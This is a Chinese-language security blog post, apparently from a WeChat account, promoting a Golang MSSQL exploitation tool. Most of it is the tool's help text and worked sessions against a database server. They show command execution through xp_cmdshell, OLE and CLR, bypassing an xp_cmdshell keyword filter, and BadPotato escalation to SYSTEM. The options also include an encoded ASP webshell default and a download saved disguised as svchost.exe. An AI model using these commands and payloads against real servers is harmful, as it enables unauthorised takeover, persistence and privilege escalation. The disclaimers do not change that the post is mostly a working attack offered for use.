声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
工具介绍
@Mayter师傅参考以下几个项目用Golang写的一款MSSQL利用工具:xp_cmdshell与sp_oacreate执行命令回显和clr加载程序集执行相应操作,上传,job等相应操作。
https://github.com/Ridter/PySQLTools
https://github.com/uknowsec/SharpSQLTools
https://github.com/Ridter/MSSQL_CLR
https://github.com/JKme/cube/blob/master/core/sqlcmdmodule/mssql3.go
https://quan9i.top/post/SQL%20Server%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%96%B9%E5%BC%8F%E6%B1%87%E6%80%BB/
帮助:
NAME:
Mssql Toolkit - mssql command tool
USAGE:
mssql-command-tools_Windows_64.exe [
global
options] command [command options] [arguments...]
AUTHOR:
Microsoft.com clr参考: https:
//github.com/uknowsec/SharpSQLTools/
COMMANDS:
help, h Shows a list of commands or help
for
one command
GLOBAL OPTIONS:
--server
value
, --host
value
, -
s
value
The database
server
(
default
:
"127.0.0.1"
)
--user
value
, -u
value
The database
user
(
default
:
"sa"
)
--password
value
, -p
value
The database password
--database
value
, -d
value
The database
name
(
default
:
"msdb"
)
--port
value
, -P
value
The database
port
(
default
:
1433
)
--option
value
-xcmd, -X
powershell
(
default
:
"whoami"
)
--query
value
, -q
value
, --sql
value
SQL
query
(
default
:
"select @@version"
)
--cmd
value
, -c
value
, --exec
value
Exec System Command | xp_cmdshell命令执行 (
default
:
"whoami"
)
--cmd1
value
, --c1
value
Exec System Command | sp_oacreate无回显执行 (
default
:
"whoami >C:\whoami.log"
)
--cmd2
value
, --c2
value
Exec System Command | sp_oacreate有回显执行 | wscript.
shell
(
default
:
"whoami"
)
--cmdsp
value
Exec System Command | sp_oacreate有回显执行 |
{
72
C24DD5-D70A
-438B
-8
A42
-98424B
88AFB8} (
default
:
"whoami"
)
--cmd3
value
, --c3
value
Exec System Command | clr执行 | clr命令参考: https:
//github.com/uknowsec/SharpSQLTools/ (default: "clr_exec whoami")
--cmdpy
value
Exec System Command | clr执行 | clr命令参考: https:
//github.com/Ridter/PySQLTools (default: "clr_exec whoami")
--cmd4
value
, --c4
value
Exec System Command | 自写clr执行 (
default
:
"-c4 net -c5 user"
)
--cmd5
value
, --c5
value
Exec System Command | 自写clr执行 (
default
:
"-c4 net -c5 user"
)
--cmd6
value
, --c6
value
Exec System Command | xp_cmdshell命令执行|过滤了xp_cmdshell等关键字提交方法语句 (
default
:
"-c6 whoami"
)
--cmd7
value
, --c7
value
Exec System Command | 自写clr执行 (
default
:
"-c7 whoami"
)
--cmd8
value
, --c8
value
Exec System Command |
r language
command
(
default
:
"-c8 whoami"
)
--cmd9
value
, --c9
value
Exec System Command | python language
command
(
default
:
"-c9 whoami"
)
--cmd10
value
, --c10
value
Exec System Command | createAndStartJob
command
(
default
:
"-c10 whoami >c:\windows\temp\123.txt"
)
--cmd11
value
, --c11
value
Exec System Command | 自写clr执行 | --option -x --cmd11 cmd | --option -X --cmd11
powershell
(
default
:
"--option -x --cmd11 cmd"
)
--dir
value
, --dirtree
value
xp_dirtree列目录 | dir c:
--path
value
网站路径 -path + -code | c:inetpubwwwrootcmd.
asp
(
default
:
"c:\inetpub\wwwroot\cmd.asp"
)
--local
value
本地路径
localFile
(
default
:
"c:\1.txt"
)
--remote
value
远程路径
remoteFile
(
default
:
"C:\Windows\Temp\1.txt"
)
--code
value
-path + -code | 如果代码有"就加来匹配<%eval
request
(
"cmd"
)%>网站路径和asp密码默认:
LandGrey
(
default
:
"<%@codepage=65000%><%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>"
)
--downurl
value
下载文件的url地址 | http:
//www.microsoft.com/defender.exe
--filepath
value
下载文件的路径 | c:programdatasvchost.exe
--debug Debug info
--enable, -e Enabled xp_cmdshell
--disable, --diclose Disable xp_cmdshell
--ole, --oleopen Enabled sp_oacreate
--dole, --dolose Disable sp_oacreate
--clr, --clropen Enabled clr enabled
--dclr, --dclose Disable clr enabled
--rlce, --rlceopen r|python languag eenabled
--jobopen MSSQL Agent Job服务开启
--install_clr, --in_clr install clr | --cmd3 "clr_exec whoami" | clr命令参考: https:
//github.com/uknowsec/SharpSQLTools/
--uninstall_clr, --un_clr uninstall clr | --cmd3 "clr_exec whoami"
--installpy_clr, --inpy_clr installpy clr | --cmdpy "clr_exec whoami" | clr命令参考: https:
//github.com/Ridter/PySQLTools
--uninstallpy_clr, --unpy_clr uninstallpy clr | --cmdpy "clr_exec whoami"
--install_clrcmd, --in_clrcmd install clrcmd | "--c4 net --c5 user"
--uninstall_clrcmd, --un_clrcmd uninstall clrcmd | "--c4 net --c5 user"
--install_clrcmd1, --in_clrcmd1 install clrcmd1 | --cmd7 "whoami"
--uninstall_clrcmd1, --un_clrcmd1 uninstall clrcmd | --cmd7 "whoami"
--install_clrcmd2, --in_clrcmd2 install clrcmd2 | --cmd11 "whoami"
--uninstall_clrcmd2, --un_clrcmd2 uninstall clrcmd2 | --cmd11 "whoami"
--upload --upload --local c:svchost.exe --remote C:WindowsTempsvchost.exe
--help, -h show help
示例:
开启xp_cmdshell组件
mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin
--enable/--e
开启sp_oacreate组件
mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin
--ole/--o
开启ole组件
mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin -clr
xp_cmdshell 执行
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd "whoami"
nt servicemssqlserver
绕过过滤xp_cmdshell关键字
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd6 "whoami"
nt servicemssqlserver
sp_oacreate 执行 略微不一样,但大致一样
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd2 "whoami"
nt servicemssqlserver
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmdsp "whoami"
nt servicemssqlserver
安装SharpSQLTools clr
mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345
--install_clr
Clrcmd
Install
SharpSQLTools CLR Success.
执行命令
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -cmd3
"clr_exec whoami"
mssql: [+] Process: cmd.exe
mssql: [+] arguments: /c whoami
mssql: [+] RunCommand: cmd.exe /c whoami
mssql:
mssql: nt servicemssqlserver
提权
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -cmd3
"clr_badpotato whoami"
mssql: [*] CreateNamedPipeW
Success
! IntPtr:
4048
mssql: [*] RpcRemoteFindFirstPrinterChangeNotificationEx
Success
! IntPtr:
1816351484896
mssql: [*] ConnectNamePipe
Success
!
mssql: [*] CurrentUserName : MSSQLSERVER
mssql: [*] CurrentConnectPipeUserName :
SYSTEM
mssql: [*] ImpersonateNamedPipeClient
Success
!
mssql: [*] OpenThreadToken
Success
! IntPtr:
6840
mssql: [*] DuplicateTokenEx
Success
! IntPtr:
6556
mssql: [*] SetThreadToken
Success
!
mssql: [*] CreateOutReadPipe
Success
! out_read:
5536
out_write:
5528
mssql: [*] CreateErrReadPipe
Success
! err_read:
3436
err_write:
5072
mssql: [*] CreateProcessWithTokenW
Success
! ProcessPid:
9608
mssql: nt authority
system
卸载SharpSQLTools clr
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345
--uninstall_clr
Uninstall
SharpSQLTools CLR Success.
安装PySQLTools clr
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345
--installpy_clr
Clrcmd
Install
PySQLTools Clr Success.
执行命令
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -cmdpy
"clr_exec whoami"
mssql: [+] Successfully unhooked ETW!
mssql: [*]
No
dll
to
patch
mssql: [+] Process: cmd.exe
mssql: [+] arguments: /c whoami
mssql: [+] RunCommand: cmd.exe /c whoami
mssql:
mssql: nt servicemssqlserver
提权
卸载PySQLTools clr
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345
--uninstallpy_clr
Uninstall
PySQLTools Clr Success.
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -cmd4 net -cmd5
user
\ 的用户帐户
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
WDAGUtilityAccount
命令运行完毕,但发生一个或多个错误。
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -cmd7
"whoami"
mssql: Command
is
running, please wait.
mssql: nt servicemssqlserver
mssql: nt servicemssqlserver
r
language
command (
default
:
"-c8 whoami"
)
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -cmd8
"whoami"
nt servicemssqllaunchpad
python
language
command (
default
:
"-c9 whoami"
)
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -cmd9
"whoami"
nt servicemssqllaunchpad
执行CreateAndStartJob
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -cmd10
"whoami >c:\programdata\test.txt"
CreateAndStartJob Command
Success
!
当权限不足的时候
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -cmd3
"clr_efspotato net start SQLSERVERAGENT"
列目录
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -dir
"c:\programdata"
subdirectory
depth
file
123.
dll
Application
Data
Documents
Huorong
Microsoft
MSSQLSERVER
Package
Cache
regid
.1991
-06.
com.microsoft
SoftwareDistribution
SSISTelemetry
Templates
test.txt
USOPrivate
USOShared
VMware
「开始」菜单
桌面
Command
List
Dir Success.
-x cmd命令
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -
option
-x
--cmd11 "whoami"
[]
nt servicemssqlserver
-X powershell命令
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -
option
-X
--cmd11 "Get-Process explorer"
[]
Handles NPM(K) PM(K) WS(K) CPU(s)
Id
SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
2296
113
71352
183772
1304
1
explorer
上传文件
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345
--upload --local c:Database.dll --remote C:programdataDatabase.dll
[*] Uploading
'c:Database.dll'
to
'C:programdataDatabase.dll'
...
[!] C:programdataDatabase.dll Upload
Success
mssql-command-tools_Windows_64.exe -s
192.168
.3
.186
-u sa -p Admin12345 -dir
"c:\programdata"
subdirectory
depth
file
123.
dll
Application
Data
Database.dll
下载地址
原文始发于微信公众号(天驿安全):MSSQL渗透多功能命令利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论